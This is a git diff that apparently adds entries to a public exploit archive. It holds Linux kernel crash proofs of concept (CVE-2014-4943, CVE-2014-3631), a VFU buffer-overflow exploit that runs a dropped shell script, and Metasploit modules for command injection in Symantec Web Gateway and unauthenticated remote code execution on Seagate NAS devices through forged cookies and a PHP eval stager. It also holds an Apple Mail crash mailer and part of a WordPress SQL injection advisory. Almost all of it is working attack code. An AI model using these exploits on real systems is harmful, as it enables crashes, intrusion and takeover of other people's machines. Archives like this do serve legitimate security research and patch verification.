+#include <linux/net.h>
+#include <linux/udp.h>
+#include <linux/if.h>
+#include <linux/if_pppox.h>
+#include <linux/if_pppol2tp.h>
+
+
+/* -----------------------   Definitions ----------------------------*/
+
+#define TARGET_KERNEL_MIN "3.2.0"
+#define TARGET_KERNEL_MAX "3.15.6"
+#define EXPLOIT_NAME "cve-2014-4943"
+
+
+
+/* -----------------------   functions ----------------------------*/
+
+
+/**
+ * It is possible to modify several parts of socket object using IP options frop UDP setsockopt
+ * For this POC, IP_OPTIONS is the easiest way to panic kernel
+ */
+void modifyUDPvalues(int tunnel_fd)
+{
+/* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:
+  
+ int udp_setsockopt(struct sock *sk, int level, int optname,
+                    char __user *optval, unsigned int optlen)
+ {
+         if (level == SOL_UDP  ||  level == SOL_UDPLITE)
+                 return udp_lib_setsockopt(sk, level, optname, optval, optlen,
+                                           udp_push_pending_frames);
+         return ip_setsockopt(sk, level, optname, optval, optlen);
+ }
+*/
+  
+  int ip_options = 0x1;
+     
+  if (setsockopt(tunnel_fd, SOL_IP,  IP_OPTIONS, &ip_options, 20) == -1) 
+    {
+        perror("setsockopt (IP_OPTIONS)");   
+    }
+}
+
+
+/**
+ * DOS poc for cve_2014_4943 vulnerability
+ */
+int main()
+{
+
+  int tunnel_fd;
+  int tunnel_fd2;
+  int udp_fd;
+
+  printf("[cve_2014_4943]: Preparing to exploit.\n");
+
+  /* Create first L2TP socket */
+  tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
+  if (tunnel_fd < 0)
+  {
+    perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
+    return -1;
+  }
+  /* Create second L2TP socket */
+  tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
+  if (tunnel_fd2 < 0)
+  {
+    perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
+    return -1;
+  }
+  if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) 
+  {
+    perror("cannot create socket"); 
+    return -1; 
+  }
+  
+  /* Connect LT2P socket */
+  struct sockaddr_pppol2tp sax;
+
+  memset(&sax, 0, sizeof(sax));
+  sax.sa_family = AF_PPPOX;
+  sax.sa_protocol = PX_PROTO_OL2TP;
+  sax.pppol2tp.fd = udp_fd;       /* fd of tunnel UDP socket */
+  sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;
+  sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;
+  sax.pppol2tp.addr.sin_family = AF_INET;
+  sax.pppol2tp.s_tunnel = 8;//tunnel_id;
+  sax.pppol2tp.s_session = 0;     /* special case: mgmt socket */
+  sax.pppol2tp.d_tunnel = 0;
+  sax.pppol2tp.d_session = 0;     /* special case: mgmt socket */
+
+  if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )
+  {
+    perror("connect failed");
+  }
+  
+  /* Connect LT2P socket */
+  struct sockaddr_pppol2tp sax2;
+
+  memset(&sax, 0, sizeof(sax2));
+  sax2.sa_family = AF_PPPOX;
+  sax2.sa_protocol = PX_PROTO_OL2TP;
+  sax2.pppol2tp.s_tunnel = 8;//tunnel_id;
+  sax2.pppol2tp.s_session = 1;     
+  sax2.pppol2tp.d_tunnel = 0;
+  sax2.pppol2tp.d_session = 1;     
+
+  if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )
+  {
+    perror("connect failed");
+  }
+  
+  
+  /*
+     * Entering critical part
+     */
+    printf("[cve_2014_4943]:  Panic!\n");
+  
+  //modifyUDPvalues(tunnel_fd);
+  modifyUDPvalues(tunnel_fd2);
+
+  
+  // close opened socket  
+  puts("\n [+] Closing sockets...");
+  close(tunnel_fd);
+  close(tunnel_fd2);
+    
+  exit(0);
+}
diff --git a/platforms/linux/dos/36268.c b/platforms/linux/dos/36268.c
new file mode 100755
index 000000000..b06453976
--- /dev/null
+++ b/platforms/linux/dos/36268.c
@@ -0,0 +1,107 @@
+/* ----------------------------------------------------------------------------------------------------
+ * cve-2014-3631_poc.c
+ * 
+ * The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3 
+ * does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash) 
+ * or possibly have unspecified other impact via multiple "keyctl newring" operations followed by a "keyctl timeout" operation. 
+ *
+ * 
+ * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
+ * 
+ * Compile with gcc -fno-stack-protector -Wall -o cve-2014-3631_poc cve-2014-3631_poc.c  -lkeyutils 
+ * 
+ * 
+ * Emeric Nasi - www.sevagas.com
+ *-----------------------------------------------------------------------------------------------------*/
+
+
+/* -----------------------   Includes ----------------------------*/
+
+#define _GNU_SOURCE 1
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <syscall.h>
+#include <stdint.h>
+#include <inttypes.h>
+#include <keyutils.h>
+#include <fcntl.h>
+
+
+#define TARGET_KERNEL_MIN "3.13.0"
+#define TARGET_KERNEL_MAX "3.16.2"
+#define EXPLOIT_NAME "cve-2014-3631"
+#define EXPLOIT_TYPE DOS
+
+
+/* -----------------------   functions ----------------------------*/
+
+
+
+/**
+ * Poc for cve_2014_3631 vulnerability
+ */
+int main()
+{
+  key_serial_t currentKey = 0;
+  key_serial_t topKey = 0;
+  int i = 0;
+  int fp;
+  char kname[16]={0};
+  char gc_delay[16] = {0};
+  int delay  =0;
+  
+  printf("[cve_2014_3631]: Preparing to exploit.\n");
+
+  // fetch garbage collector value..
+  fp = open("/proc/sys/kernel/keys/gc_delay",O_RDONLY);
+  if(fp == -1)
+  {
+     printf("[cve_2014_3631 error]: Could not open /proc/sys/kernel/keys/gc_delay, assuming delay is 5 minutes. \n");
+     delay = 300;
+  }
+  else
+  {
+    read(fp,gc_delay,sizeof(gc_delay-1));
+    delay = atoi(gc_delay);
+    close(fp);  
+  }
+
+  // Add top key
+  topKey = add_key("keyring","Lvl1K",NULL,0,KEY_SPEC_USER_KEYRING);
+  if(topKey == -1)
+  {
+    printf("[cve_2014_3631 error]: keyring  fault\n");
+    perror("add_key");
+    return -1;
+  }
+  
+  // Add 18 keys to top key
+  for(i=0; i< 18; i++)
+  {
+    memset(kname,00,sizeof(kname));
+    memcpy(kname,"Lvl2K_",strlen("Lvl2K_"));
+    sprintf(kname+strlen("Lvl2K_"),"%d",i);
+    currentKey = add_key("keyring",kname,NULL,0,topKey);
+    if(currentKey == -1)
+    {
+      printf("[cve_2014_3631 error]: keyring  fault\n");
+      perror("add_key");
+      return -1;
+    }
+  } 
+  
+  /* Entering exploit critical code */
+  printf("[cve_2014_3631]:  Exploit!\n");
+  
+  // Set timeout and wait for garbage collector
+  keyctl_set_timeout(currentKey, 2);
+  
+  // Wait for garbage collector
+  printf("[cve_2014_3631]: Exploit triggered, system will panic in  %d seconds..\n",delay);
+  
+  return 0;
+}
diff --git a/platforms/linux/local/36229.py b/platforms/linux/local/36229.py
new file mode 100755
index 000000000..5105d5400
--- /dev/null
+++ b/platforms/linux/local/36229.py
@@ -0,0 +1,48 @@
+# Exploit Title: VFU Move Entry Buffer Overflow
+# Date: 2015-02-25
+# Exploit Author: Bas van den Berg -- @barrebas
+# Vendor Homepage: http://cade.datamax.bg/
+# Software Link: http://cade.datamax.bg/vfu/#download
+# Version: 4.10-1.1
+# Tested on: GNU/Linux Kali 1.09 32-bit & Crunchbang 11 Waldorf (based on Debian Wheezy), kernel 3.2.0-4
+
+# VFU 4.10 (probably up to 4.14) contains a buffer overflow when a user
+# moves a file entry around with a large filename. To trigger this 
+# vulnerability, extensive user interaction is required.
+# Steps to reproduce the bug: create a file with a large (>115 
+# characters), run VFU and select 'A' and then 'V' to move the large 
+# file entry around. Upon confirming the entry move, VFU crashes due to 
+# a buffer overflow in this function:
+
+'''
+void vfu_file_entry_move()
+{
+  char t[128];
+  sprintf( t, "MOVE/REORDER File entry: %s", files_list[FLI]->name() );
+  say1( t );
+  say2( "Use Up/Down Arrows to reorder, ESC,ENTER when done." );
+'''
+
+# This overflow allows execution of arbitrary commands with the 
+# privilege of the current user. The attached PoC demonstrates this. It 
+# drops two files: the large filename and a shellscript that allows 
+# arbitrary command execution. Usage: $ python vfu-move-entry-poc.py
+
+
+import struct
+import os
+
+def p(x):
+	return struct.pack('<L', x & 0xffffffff)
+
+with open('./vstring.h', 'w') as f:
+	f.write('#!/bin/sh\ntouch pwned')
+	f.close()
+os.chmod('./vstring.h', 0755)
+
+payload = "A"*115
+payload += p(0x8049ca0) # system@plt
+payload += p(0x804a260) # exit@plt
+payload += p(0x8088e44) # -> ./vstring.h
+
+open(payload, 'w').close()
diff --git a/platforms/linux/remote/36263.rb b/platforms/linux/remote/36263.rb
new file mode 100755
index 000000000..6810f52ae
--- /dev/null
+++ b/platforms/linux/remote/36263.rb
@@ -0,0 +1,243 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
+      'Description'    => %q{
+          This module exploits a command injection vulnerability found in Symantec Web
+        Gateway's setting restoration feature. The filename portion can be used to inject
+        system commands into a syscall function, and gain control under the context of
+        HTTP service.
+
+        For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user.
+        However, for version 5.2.1, you must be an administrator.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Egidio Romano', # Original discovery & assist of MSF module
+          'sinn3r'
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-7285' ],
+          [ 'OSVDB', '116009' ],
+          [ 'BID', '71620' ],
+          [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ],
+          [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00']
+        ],
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic python'
+            }
+        },
+      'DefaultOptions' => {
+        'RPORT'      => 443,
+        'SSL'        => true,
+        'SSLVersion' => 'TLS1'
+      },
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['Symantec Web Gateway 5', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014)
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password for the username'])
+      ], self.class)
+  end
+
+  def protocol
+    ssl ? 'https' : 'http'
+  end
+
+  def check
+    uri = target_uri.path
+    res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')})
+
+    if res && res.body.include?('Symantec Web Gateway')
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def get_sid
+    sid = ''
+
+    uri = target_uri.path
+    res = send_request_cgi({
+      'uri'    => normalize_uri(uri, 'spywall/login.php'),
+      'method' => 'GET',
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID')
+    end
+
+    cookies = res.get_cookies
+    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
+
+    sid
+  end
+
+  def login(sid)
+    uri = target_uri.path
+    res = send_request_cgi({
+      'uri'    => normalize_uri(uri, 'spywall/login.php'),
+      'method' => 'POST',
+      'cookie' => sid,
+      'headers' => {
+        'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}"
+      },
+      'vars_post' => {
+        'USERNAME' => datastore['USERNAME'],
+        'PASSWORD' => datastore['PASSWORD'],
+        'loginBtn' => 'Login'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while attempting to login')
+    end
+
+    cookies = res.get_cookies
+    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
+
+    if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank?
+      # Successful login
+      return sid
+    else
+      # Failed login
+      fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+    end
+  end
+
+  def build_payload
+    # At of today (Feb 27 2015), there are only three payloads this module will support:
+    # * cmd/unix/generic
+    # * cmd/unix/reverse_python
+    # * cmd/unix/reverse_python_ssl
+    p = payload.encoded
+
+    case datastore['PAYLOAD']
+    when /cmd\/unix\/generic/
+      # Filter that one out, Mr. basename()
+      p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
+      p = "python -c \"exec('#{p}'.decode('base64'))\""
+    else
+      p = p.gsub(/python -c "exec/, 'python -c \\"exec')
+      p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"")
+    end
+
+    p
+  end
+
+  def build_mime
+    p = build_payload
+
+    data = Rex::MIME::Message.new
+    data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"')
+    data.add_part('maintenance', nil, nil, 'form-data; name="configuration"')
+    data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""')
+    data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"')
+    data.add_part('', nil, nil, 'form-data; name="restore"')
+    data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"")
+    data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"')
+    data.add_part('0', nil, nil, 'form-data; name="event_horizon"')
+    data.add_part('0', nil, nil, 'form-data; name="max_events"')
+    data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"')
+    data.add_part('', nil, nil, 'form-data; name="testaddress"')
+    data.add_part('', nil, nil, 'form-data; name="pingaddress"')
+    data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"')
+    data.add_part('', nil, nil, 'form-data; name="capture_filter"')
+
+    data
+  end
+
+  def inject_exec(sid)
+    uri = target_uri.path
+    mime = build_mime # Payload inside
+    send_request_cgi({
+      'uri'     => normalize_uri(uri, 'spywall/restore.php'),
+      'method'  => 'POST',
+      'cookie'  => sid,
+      'data'    => mime.to_s,
+      'ctype'   => "multipart/form-data; boundary=#{mime.bound}",
+      'headers' => {
+        'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}"
+      }
+    })
+  end
+
+  def save_cred(username, password)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: protocol,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      username: username,
+      private_data: password,
+      private_type: :password
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def exploit
+    print_status("Getting the PHPSESSID...")
+    sid = get_sid
+    if sid.blank?
+      print_error("Failed to get the session ID. Cannot continue with the login.")
+      return
+    end
+
+    print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+    sid = login(sid)
+    if sid.blank?
+      print_error("Failed to get the session ID from the login process. Cannot continue with the injection.")
+      return
+    else
+      # Good password, keep it
+      save_cred(datastore['USERNAME'], datastore['PASSWORD'])
+    end
+
+    print_status("Trying restore.php...")
+    inject_exec(sid)
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/osx/dos/36271.py b/platforms/osx/dos/36271.py
new file mode 100755
index 000000000..6bfd25938
--- /dev/null
+++ b/platforms/osx/dos/36271.py
@@ -0,0 +1,43 @@
+source: http://www.securityfocus.com/bid/50446/info
+
+Apple Mac OS X and iOS are prone to a denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause the affected mail client to crash, effectively denying service. 
+
+#!/usr/bin/env python
+
+# Mail of death for Apple's Mail.app
+#
+# Tested & vulnerable:  Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
+# Tested != vulnerable: Leopard/PPC
+# Create mail with n_attach MIME attachments
+# Version 1.0; shebang42
+
+import smtplib
+
+n_attach=2040 # ~2024 is sufficient
+relay='your.mta.goes.here'
+mailfrom = 'mail_of_death@example.com'
+mailto = mailfrom
+subject = 'PoC Apple Mail.app mail of death'
+date = 'October 29, 2011 10:00:00 GMT'
+
+
+def craft_mail():
+    header = 'From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary="delim"\n\n' % (mailfrom, mailto, subject, date)
+    body = '--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n'
+    attach = '--delim\nContent-Disposition: inline\n\n'*n_attach
+
+    ### Another, slightly longer option to crash Mail.app (same bug)
+    # attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment; filename=AAAAAAAA\n\ncontent\n'*n_attach
+    return header + body + attach
+
+
+def send_mail(mail):
+    server = smtplib.SMTP(relay)
+    server.sendmail(mailfrom, mailto, mail)
+    server.quit()
+
+mail=craft_mail()
+#print mail
+send_mail (mail)
\ No newline at end of file
diff --git a/platforms/php/remote/36264.rb b/platforms/php/remote/36264.rb
new file mode 100755
index 000000000..7eb4bedf3
--- /dev/null
+++ b/platforms/php/remote/36264.rb
@@ -0,0 +1,354 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Seagate Business NAS Unauthenticated Remote Command Execution',
+      'Description'    => %q{
+        Some Seagate Business NAS devices are vulnerable to command execution via a local
+        file include vulnerability hidden in the language parameter of the CodeIgniter
+        session cookie. The vulnerability manifests in the way the language files are
+        included in the code on the login page, and hence is open to attack from users
+        without the need for authentication. The cookie can be easily decrypted using a
+        known static encryption key and re-encrypted once the PHP object string has been
+        modified.
+
+        This module has been tested on the STBN300 device.
+      },
+      'Author'         => [
+          'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module
+        ],
+      'References'     => [
+          ['CVE', '2014-8684'],
+          ['CVE', '2014-8686'],
+          ['CVE', '2014-8687'],
+          ['EDB', '36202'],
+          ['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'],
+          ['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/']
+        ],
+      'DisclosureDate' => 'Mar 01 2015',
+      'Privileged'     => true,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Payload'        => {'DisableNops' => true},
+      'Targets'        => [['Automatic', {}]],
+      'DefaultTarget'  => 0,
+      'License'        => MSF_LICENSE
+      ))
+
+    register_options([
+        OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
+        OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']),
+        OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']),
+        OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07'])
+      ])
+  end
+
+  #
+  # Write a string value to a serialized PHP object without deserializing it first.
+  # If the value exists it will be updated.
+  #
+  def set_string(php_object, name, value)
+    prefix = "s:#{name.length}:\"#{name}\";s:"
+    if php_object.include?(prefix)
+      # the value already exists in the php blob, so update it.
+      return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"")
+    end
+
+    # the value doesn't exist in the php blob, so create it.
+    count = php_object.split(':')[1].to_i + 1
+    php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}")
+  end
+
+  #
+  # Findez ze holez!
+  #
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'      => normalize_uri(target_uri),
+        'method'   => 'GET',
+        'headers'  => {
+          'Accept' => 'text/html'
+        }
+      )
+
+      if res && res.code == 200
+        headers = res.to_s
+
+        # validate headers
+        if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
+          # and make sure that the body contains the title we'd expect
+          if res.body.include?('Login to BlackArmor')
+            return Exploit::CheckCode::Appears
+          end
+        end
+      end
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
+      # something went wrong, assume safe.
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  #
+  # Executez ze sploitz!
+  #
+  def exploit
+
+    # Step 1 - Establish a session with the target which will give us a PHP object we can
+    # work with.
+    begin
+      print_status("#{peer} - Establishing session with target ...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(target_uri),
+        'method' => 'GET',
+        'headers'  => {
+          'Accept' => 'text/html'
+        }
+      })
+
+      if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
+        cookie_value = $1.strip
+      else
+        fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
+      end
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
+      fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
+    end
+
+    # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
+    # then update it so that it's an admin session before re-encrypting
+    print_status("#{peer} - Upgrading session to administrator ...")
+    php_object = decode_cookie(cookie_value)
+    vprint_status("#{peer} - PHP Object: #{php_object}")
+
+    admin_php_object = set_string(php_object, 'is_admin', 'yes')
+    admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
+    vprint_status("#{peer} - Admin PHP object: #{admin_php_object}")
+
+    admin_cookie_value = encode_cookie(admin_php_object)
+
+    # Step 3 - Extract the current host configuration so that we don't lose it.
+    host_config = nil
+
+    # This time value needs to be consistent across calls
+    config_time = ::Time.now.to_i
+
+    begin
+      print_status("#{peer} - Extracting existing host configuration ...")
+      res = send_request_cgi(
+        'uri'      => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
+        'method'   => 'GET',
+        'headers'  => {
+          'Accept' => 'text/html'
+        },
+        'cookie'   => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
+        'vars_get' => {
+          '_'      => config_time
+        }
+      )
+
+      if res && res.code == 200
+        res.body.split("\r\n").each do |l|
+          if l.include?('general_setup')
+            host_config = l
+            break
+          end
+        end
+      else
+        fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
+      end
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
+      fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
+    end
+
+    print_good("#{peer} - Host configuration extracted.")
+    vprint_status("#{peer} - Host configuration: #{host_config}")
+
+    # Step 4 - replace the host device description with a custom payload that can
+    # be used for LFI. We have to keep the payload small because of size limitations
+    # and we can't put anything in with '$' in it. So we need to make a simple install
+    # payload which will write a required payload to disk that can be executes directly
+    # as the last part of the payload. This will also be self-deleting.
+    param_id = rand_text_alphanumeric(3)
+
+    # There are no files on the target file system that start with an underscore
+    # so to allow for a small file size that doesn't collide with an existing file
+    # we'll just prefix it with an underscore.
+    payload_file = "_#{rand_text_alphanumeric(3)}.php"
+
+    installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
+    stager = Rex::Text.encode_base64(installer)
+    stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
+    vprint_status("#{peer} - Stager: #{stager}")
+
+    # Butcher the XML directly rather than attempting to use REXML. The target XML
+    # parser is way to simple/flaky to deal with the proper stuff that REXML
+    # spits out.
+    desc_start = host_config.index('" description="') + 15
+    desc_end = host_config.index('"', desc_start)
+    xml_payload = host_config[0, desc_start] +
+                  stager + host_config[desc_end, host_config.length]
+    vprint_status(xml_payload)
+
+    # Step 5 - set the host description to the stager so that it is written to disk
+    print_status("#{peer} - Uploading stager ...")
+    begin
+      res = send_request_cgi(
+        'uri'             => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
+        'method'          => 'POST',
+        'headers'         => {
+          'Accept'        => 'text/html'
+        },
+        'cookie'          => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
+        'vars_get'        => {
+          '_'             => config_time
+        },
+        'vars_post'       => {
+          'general_setup' => xml_payload
+        }
+      )
+
+      unless res && res.code == 200
+        fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
+      end
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
+      fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
+    end
+
+    print_good("#{peer} - Stager uploaded.")
+
+    # Step 6 - Invoke the stage, passing in a self-deleting php script body.
+    print_status("#{peer} - Executing stager ...")
+    payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
+    payload_cookie_value = encode_cookie(payload_php_object)
+    self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
+    errored = false
+
+    begin
+      res = send_request_cgi(
+        'uri'      => normalize_uri(target_uri),
+        'method'   => 'POST',
+        'headers'  => {
+          'Accept' => 'text/html'
+        },
+        'cookie'    => "#{datastore['COOKIEID']}=#{payload_cookie_value}",
+        'vars_post' => {
+          param_id  => Rex::Text.encode_base64(self_deleting_payload)
+        }
+      )
+
+      if res && res.code == 200
+        print_good("#{peer} - Stager execution succeeded, payload ready for execution.")
+      else
+        print_error("#{peer} - Stager execution failed (invalid result).")
+        errored = true
+      end
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
+      print_error("#{peer} - Stager execution failed (unable to establish connection).")
+      errored = true
+    end
+
+    # Step 7 - try to restore the previous configuration, allowing exceptions
+    # to bubble up given that we're at the end. This step is important because
+    # we don't want to leave a trail of junk on disk at the end.
+    print_status("#{peer} - Restoring host config ...")
+    res = send_request_cgi(
+      'uri'             => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
+      'method'          => 'POST',
+      'headers'         => {
+        'Accept'        => 'text/html'
+      },
+      'cookie'          => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
+      'vars_get'        => {
+        '_'             => config_time
+      },
+      'vars_post'       => {
+        'general_setup' => host_config
+      }
+    )
+
+    # Step 8 - invoke the installed payload, but only if all went to plan.
+    unless errored
+      print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
+      res = send_request_cgi(
+        'uri'      => normalize_uri(target_uri, payload_file),
+        'method'   => 'GET',
+        'headers'  => {
+          'Accept' => 'text/html'
+        },
+        'cookie'   => "#{datastore['COOKIEID']}=#{payload_cookie_value}"
+      )
+    end
+  end
+
+  #
+  # Take a CodeIgnitor cookie and pull out the PHP object using the XOR
+  # key that we've been given.
+  #
+  def decode_cookie(cookie_content)
+    cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content))
+    pass = xor(cookie_value, datastore['XORKEY'])
+    result = ''
+
+    (0...pass.length).step(2).each do |i|
+      result << (pass[i].ord ^ pass[i + 1].ord).chr
+    end
+
+    result
+  end
+
+  #
+  # Take a serialised PHP object cookie value and encode it so that
+  # CodeIgniter thinks it's legit.
+  #
+  def encode_cookie(cookie_value)
+    rand = Rex::Text.sha1(rand_text_alphanumeric(40))
+
+    block  = ''
+
+    (0...cookie_value.length).each do |i|
+      block << rand[i % rand.length]
+      block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr
+    end
+
+    cookie_value = xor(block, datastore['XORKEY'])
+    cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
+    vprint_status("#{peer} - Cookie value: #{cookie_value}")
+
+    cookie_value
+  end
+
+  #
+  # XOR a value against a key. The key is cycled.
+  #
+  def xor(string, key)
+    result = ''
+
+    string.bytes.zip(key.bytes.cycle).each do |s, k|
+      result << (s ^ k)
+    end
+
+    result
+  end
+
+  #
+  # Simple XML substitution because the target XML handler isn't really
+  # full blown or smart.
+  #
+  def xml_encode(str)
+    str.gsub(/</, '<').gsub(/>/, '>')
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/36230.txt b/platforms/php/webapps/36230.txt
new file mode 100755
index 000000000..d121235ef
--- /dev/null
+++ b/platforms/php/webapps/36230.txt
@@ -0,0 +1,37 @@
+[+] Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability
+[+] Author: Ibrahim Raafat
+[+] Twitter: https://twitter.com/RaafatSEC
+[+] Plugin: https://wordpress.org/plugins/calculated-fields-form/
+
+[+] TimeLine
+	[-] Feb 6 2015, The vulnerabilities reported
+	[-] Feb 7 2015, Response and Confirming the vulnerabilities 
+	[-] Feb 8 2015, First fixing released to version 1.0.11
+	[-] Feb 17 2015, CSRF protection added to version 1.0.12
+	[-] March 1 2015, Public Disclosure
+
